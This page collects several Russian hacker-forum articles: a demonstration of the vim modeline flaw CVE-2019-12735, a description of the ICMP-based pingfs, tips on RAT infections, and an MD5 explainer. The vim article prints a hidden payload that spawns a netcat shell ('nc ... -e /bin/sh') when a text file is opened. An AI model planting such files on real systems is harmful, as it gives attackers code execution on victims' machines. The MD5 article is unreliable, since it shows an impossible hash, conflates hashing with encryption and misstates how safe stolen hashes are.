Search the Community

Приветствую, хакеры! Многим известно, что запускать неизвестного происхождения файлы небезопасно, но сколько человек при этом открывает незнакомые текстовые файлы, например, в текстовом редакторе? Особенно если это Linux и какой-нибудь проверенным временем текстовый редактор vim/emacs! Что может случиться? Краткое описание недавней уязвимости в vim Не хочу вдаваться в технические подробности дырки, которую нашли в текстовом редакторе vim, об этом написано немало статей (уязвимости присвоен номер CVE-2019-12735), но хочу рассказать о том, какую опасность это несёт и почему надо быть предельно аккуратным даже с такими, казалось бы, базовыми инструментами. Вектор атаки: вам присылают файлик, вы его открываете в vim, а тем временем у вас на компьютере выполняется код. Например, качается с удаленного сервера бекдор и устанавливается в систему. Причем вы даже не видите целиком содержимого файла, вся выполняемая конструкция замаскирована и не отображается. Демонстрация экслоита Рассмотрим один из экслоитов для vim. $ wget https://raw.githubusercontent.com/numirias/security/master/data/2019-06-04_ace-vim-neovim/shell.txt А теперь попробуем его прочитать, например, утилитой cat: $ cat shell.txt Nothing here. А вот что в файлике находится на самом деле: $ cat -v shell.txt [?7l SNothing here. :silent! w | call system('nohup nc 127.0.0.1 9999 -e /bin/sh &') | redraw! | file | silent! # " vim: set fen fdm=expr fde=assert_fails('set\ fde=x\ \|\ source\!\ \%') fdl=0: [1G [KNothing here." [D То есть вы качаете незнакомый файлик, открываете его в уязвимом текстовом редакторе и у вас открывается шелл на 9999-порту и делай дальше с вашей машиной что хочешь. Вывод Открытие незнакомых текстовых файлов даже в текстовых редакторах может быть опасным. Если вы не доверяете источнику, с которого скачен файл, лучше запустить его в изолированном окружении вроде виртуальной машины, или тестовой vps. Как вариант — добавьте в ваш шелл (например, ~/.zshrc) следующий alias, чтобы хоть как-то обнаружить возможную маскировку шелл-кода в незнакомом файле. При условии что это не эксплоит к утилите cat, или терминалу. alias cv='cat -v' Ну и конечно же не забывайте обновлять всё ПО и ОС на всех ваших девайсах. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.

Приветсвую, хакеры, в данной статье расскажу об аналоге обычной файловой системе, которая имеет отличительную черту – pingfs. Ее фишкой является сохранение всей информации в сети, в виде ICMP пакетов, которые отправляется от пк к серверам. Сервис создан при помощи API и Filesystem in userspace. Значит, что для запуска данной системы необходимы права superuser. Единственная операционная система поддерживающая данный тип файловой системы – Linux. Поддержка есть как у протоколов IPv4 так и IPv6. Работа с сервисом Чтобы скомпилировать сервис нужно прописать make в папке с инструментом. Для начала использования, нужно: Создать текстовый документ, название который установить в соответствии в название хоста и ип-адресомВключить инструмент с полученными рут-правами, сделав при помощь команды: ./pingfs “название документа” ”точка монтирования”. После программа начинает сканировать хосты на верность реакции, отправляя сразу несколько пингов. На экране выводятся некие данные и статистика, после чего файловая система будет успешно смонтированаПрограмма не закрывается и продолжает создавать динамику отправки пакетов и байтов постоянно.Для прекращения работы инструмента: Нажимаем Ctrl + CЕсли же не работает, пишем fusermount –u. Возможные операции Сохранение и удаление файловИх списокИзменения названияЧтение и записьНастройка и изменения прав доступаНевозможные операции Сохранение и удаление каталоговСохранение ссылок на файлыОтметкиСоздатель системы говорит, что сегодня скорость локальных хостов очень маленькая. Часто передача информации грозит потерей пакетов, поэтому стоит с осторожностью относится к данной файловой системе.

Всем привет, вы как и я хотите иметь максимальную безопасность, однако сделать это невозможно. Поэтому, если мы не может предоставить себе абсолютную безопасность, то мы все же можем ее повысить на более высокий уровень. Итак, немного теории, RAT – это Remote Administration Tool, что в переводу на русский язык – средство удаленного администрирования. Или проще говоря, средство удаленного доступа. При попадании вирус такого типа в вашу систему, как раз таки и позволяет злоумышленникам воровать все ваши данные: пароли, аккаунты и так далее. Первым делом вам нужно знать о том, какие признаки свидетельствуют о том, что вы заражены данным вирусом: 1. Медленная работа интернета 2. Функции троллинга Возможно это вас удивило, но это правда. Вед после заражения злоумышленник может начать в прямом смысле издеваться над вами. Они могут творить разные вещи, от маленьких и безобидных, до и реально страшных. Обычно когда это случается пользователь сразу же выключает компьютер от испуга. 3. Исчезновение ярлыков и файлов на рабочем столе 4. Общение с вами через компьютер. 5. Отключение монитора и открывание дисковода. Я перечислил главные признаки, их может быть и больше. Теперь же поговорим о том как избавиться от вируса и проучить злоумышленника. 1.Если вы хотите наказать взломщика, то вы можете проверить ип-адрес, с которым установлено соединение. 2. После того, как у нас в руках будет IP неприятеля и направляемся в ближайшее отделение правоохранительных органов с жалобой (УК РФ ст. 272) после чего ожидаем результатов. 3. Если вы были заражены таким вирусом, то избавиться от него не составит больших трудов, для этого вам будет нужно воспользоваться утилитами для очистки. 4. Просматриваем все процессы, данный вирус использует трафик, а это значит что фильтрацию нужно производить по трафике, после чего находим подозрительный процесс. Если после закрытия процесса он опять запускается, то нам нужно зайти в систему в безопасном режиме и проделать тоже самое. Если же хотите наказать нарушителя, то советую вам скинуть ратник на свою флешку. 5. Запускаем проверку обычным антивирусом. Отлично, выполнив все эти действия вы сможете избавиться от опасного вируса. На будущее при открытии подозрительный файлов проверять их с помощью ExeInfo

MD5 является 128-битным алгоритмом, создан был в начале девяностых. Для че же был создан алгоритм? Чтобы проверять, является ли данные подлинными. В данной статье мы разберем, где же применяется этот алгоритм, а также рассмотрим способы, которые помогут произвести дешифровку данных. Сфера применений MD5 Этот алгоритм используется как способ криптографии с помощью которого вы можете не только провести осмотр данных на целостность, но даже: Хранить пароли.Разработка интернет идентификаторов.Проверка файла на дубликат и прочее.Например, этот алгоритм довольно часто используют при входе на сайты. Вся входящая информация запоминается и потом находится в специальной базе. Поэтому, если хакер сможет выкрасть данную базу, то он не сможет использовать информацию, которая в ней находится. Как раз для этого многие сервисы используют данный метод шифрования. Как же выглядит этот код? Следующим образом MD5 = случайный набор символов, например MD5 = 892b7b3680cc24igf6g20g964f7f4d2. Этот непонятный код носит название – хэш MD5. Он необходим для того, чтобы проверять поступающую информацию на целостность. Каким образом это происходит? Если требуется передать массив информации, то ему выдается исходный хэш, который вычисляется алгоритмом.Происходит фиксация результата.Если проверка циклическая, то начинается сравнения исходного хэша с полученным.Если все совпало, то вам не о чем беспокоится, если же хэш различен, то это значит, что было произведено вмешательство и изменение информации. Свойства хэша Хэш должен быть способен превращать любую информацию в случайный код, который состоит из тридцати двух 16-тричных символов. Также, существует несколько вещей, которые дают возможность обезопасить человека от вторжения и изменения данных. Если вводимые данные различаются, то и хэш будет сильно отличаться.Данный алгоритм должен являться открытым, чтобы была возможность узнать, на сколько он криптостойкий.Шифрование входящих данных выполняется в одностороннем порядке, а это значит, что никто не способен исходя из результата узнать исходные данные.Алгоритм обязан использоваться минимум вычислительной мощности. Самостоятельное использование алгоритма Тут имеется один моментик – с помощью этого алгоритма любой человек может произвести проверку файла на целостность, даже скаченный из интернета. Для этого существует некоторые сервисы, например, один из таких является – HashTab. После установки программа проникает в свойства файла, как отдельная вкладка. Эта утилита позволяет шифровать данные несколькими алгоритмами, ко всему прочему данный сервис в открытом доступе, а это значит любой пользователь может использовать ее для своих целей. Как расшифровать MD5 в интернете Полученная информация превращается в “отпечаток”, который имеет определенную длину. После чего, когда файл проходит проверку, шифр сравнивается с исходными данными и после этого уже можно узнать о целостности файла. В нашем понятии произвести расшифровку таких данных нельзя, ведь именно для этого он и создан, чтобы никто не мог его взломать. Стандартные методы раскодировки в таких случаях не работают, так как информация подается в ином виде. Поэтому, хоть это представляет некоторую сложность, есть возможность только методом подбора найти информацию, а в этом нам могут пригодится некоторые сервисы. Расшифровка MD5 в интернете Каков принцип работы сервиса, который занимается раскодировкой этих файлов? Он обращается к собственной БД. Одним из таких сервисов является – MD5 Decrypter В отведенную строку прописываете код, которые вы хотите раскодировать, после чего нажимается “Decrypt”. После определенного времени появится результат, либо уведомление о том, что расшифровать хэш не удалось. Вы можете воспользоваться и другим сервисом, например, MSurf.ru. Этот сервис может помочь не только в раскодировании, но и в шифровании данных. Помните, что этот алгоритм шифрования начинает устаревать. Хакеры уже давно получает множество баз с данными, тем самым получая доступ и к зашифрованным данным. Поэтому из-за его не особо большой надежностью, советуем использовать либо еще несколько видов шифрования, либо переходить на новые методы шифрования.